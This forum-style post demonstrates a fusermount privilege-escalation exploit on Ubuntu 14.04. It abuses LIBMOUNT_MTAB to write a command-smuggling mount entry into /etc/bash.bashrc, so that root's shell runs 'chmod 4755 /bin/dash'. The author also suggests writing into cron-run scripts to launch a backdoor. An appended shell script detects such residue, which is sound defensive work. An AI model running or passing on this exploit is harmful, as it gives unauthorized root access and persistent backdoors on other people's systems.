Ubuntu 14.04.1 LTS
Code:
$ a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a
fusermount: failed to open /etc/fuse.conf: Permission denied
fusermount: mountpoint is not empty
fusermount: if you are sure this is safe, use the 'nonempty' mount option
$ ls -lia /etc/bash.bashrc
130531 -rw-r--r-- 1 root root 1,7k Mar 23 2014 /etc/bash.bashrc
$ echo $0;ls -lia /etc/$0.$0rc
/bin/sh
ls: cannot access /etc//bin/sh./bin/shrc: No such file or directory
->
Code:
$ printf "chmod 4755 /bin/dash" > /tmp/exploit && chmod 755 /tmp/exploit
$ mkdir -p '/tmp/exploit||/tmp/exploit'
$ LIBMOUNT_MTAB=/etc/bash.bashrc _FUSE_COMMFD=0 fusermount '/tmp/exploit||/tmp/exploit'
$ cat /etc/bash.bashrc
/dev/fuse /tmp/exploit||/tmp/exploit fuse rw,nosuid,nodev,user=www-data 0 0
$ ls -lia /etc/bash.bashrc
130531 -rw-r--r-- 1 root root 78 May 22 15:43 /etc/bash.bashrc
I'll add that waiting for root to log in and waiting until he sees the errors is not great at all; we run ps aux / look for any bash scripts in cron, and instead of /etc/bash.bashrc we write the launch of our backdoor there = profit
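
A defender-side check for the artifact shown in the session above, as an added example that is not part of the original post: it scans files that should never hold mount-table data for an mtab-format `fuse` line and notes when the mountpoint field contains shell metacharacters. The function names `scan_mtab_residue` and `make_sample` are hypothetical, and the sample file is constructed around the line the post shows in /etc/bash.bashrc.

```shell
#!/bin/sh
# Added example: scan_mtab_residue and make_sample are hypothetical helper names.
# Finds mtab-format FUSE entries in files that are not a mount table, which is
# what remains after fusermount writes to a path taken from LIBMOUNT_MTAB.

# scan_mtab_residue FILE...
# Prints "file:line:reason" per hit. Returns 0 if anything was found, else 1.
scan_mtab_residue() {
    rc=1
    for f in "$@"; do
        [ -r "$f" ] || continue
        if awk -v file="$f" '
            # mtab layout: source mountpoint fstype options dump pass
            NF == 6 && $3 ~ /^fuse(\.|$)/ && $5 ~ /^[0-9]+$/ && $6 ~ /^[0-9]+$/ {
                reason = "fuse mtab entry in non-mtab file"
                # A mountpoint that parses as a command when the file is sourced
                if ($2 ~ /[|;&`$()<>]/)
                    reason = reason ", shell metacharacters in mountpoint"
                printf "%s:%d:%s\n", file, NR, reason
                hit = 1
            }
            END { exit hit ? 0 : 1 }
        ' "$f"; then
            rc=0
        fi
    done
    return "$rc"
}

# make_sample PATH: writes a constructed rc file whose last line is the
# mtab entry shown in the post.
make_sample() {
    cat > "$1" <<'EOF'
# constructed sample: a shell rc file carrying an mtab line
[ -z "$PS1" ] && return
/dev/fuse /tmp/exploit||/tmp/exploit fuse rw,nosuid,nodev,user=www-data 0 0
EOF
}

# Usage: sh scan.sh /etc/bash.bashrc /etc/profile /etc/cron.d/*
if [ "$#" -gt 0 ]; then
    scan_mtab_residue "$@"
fi
```

A hit on a root-owned file whose size and mtime changed at the same moment, as in the `ls -lia` output above, is worth correlating with the `user=` option in the entry, which names the account that ran fusermount.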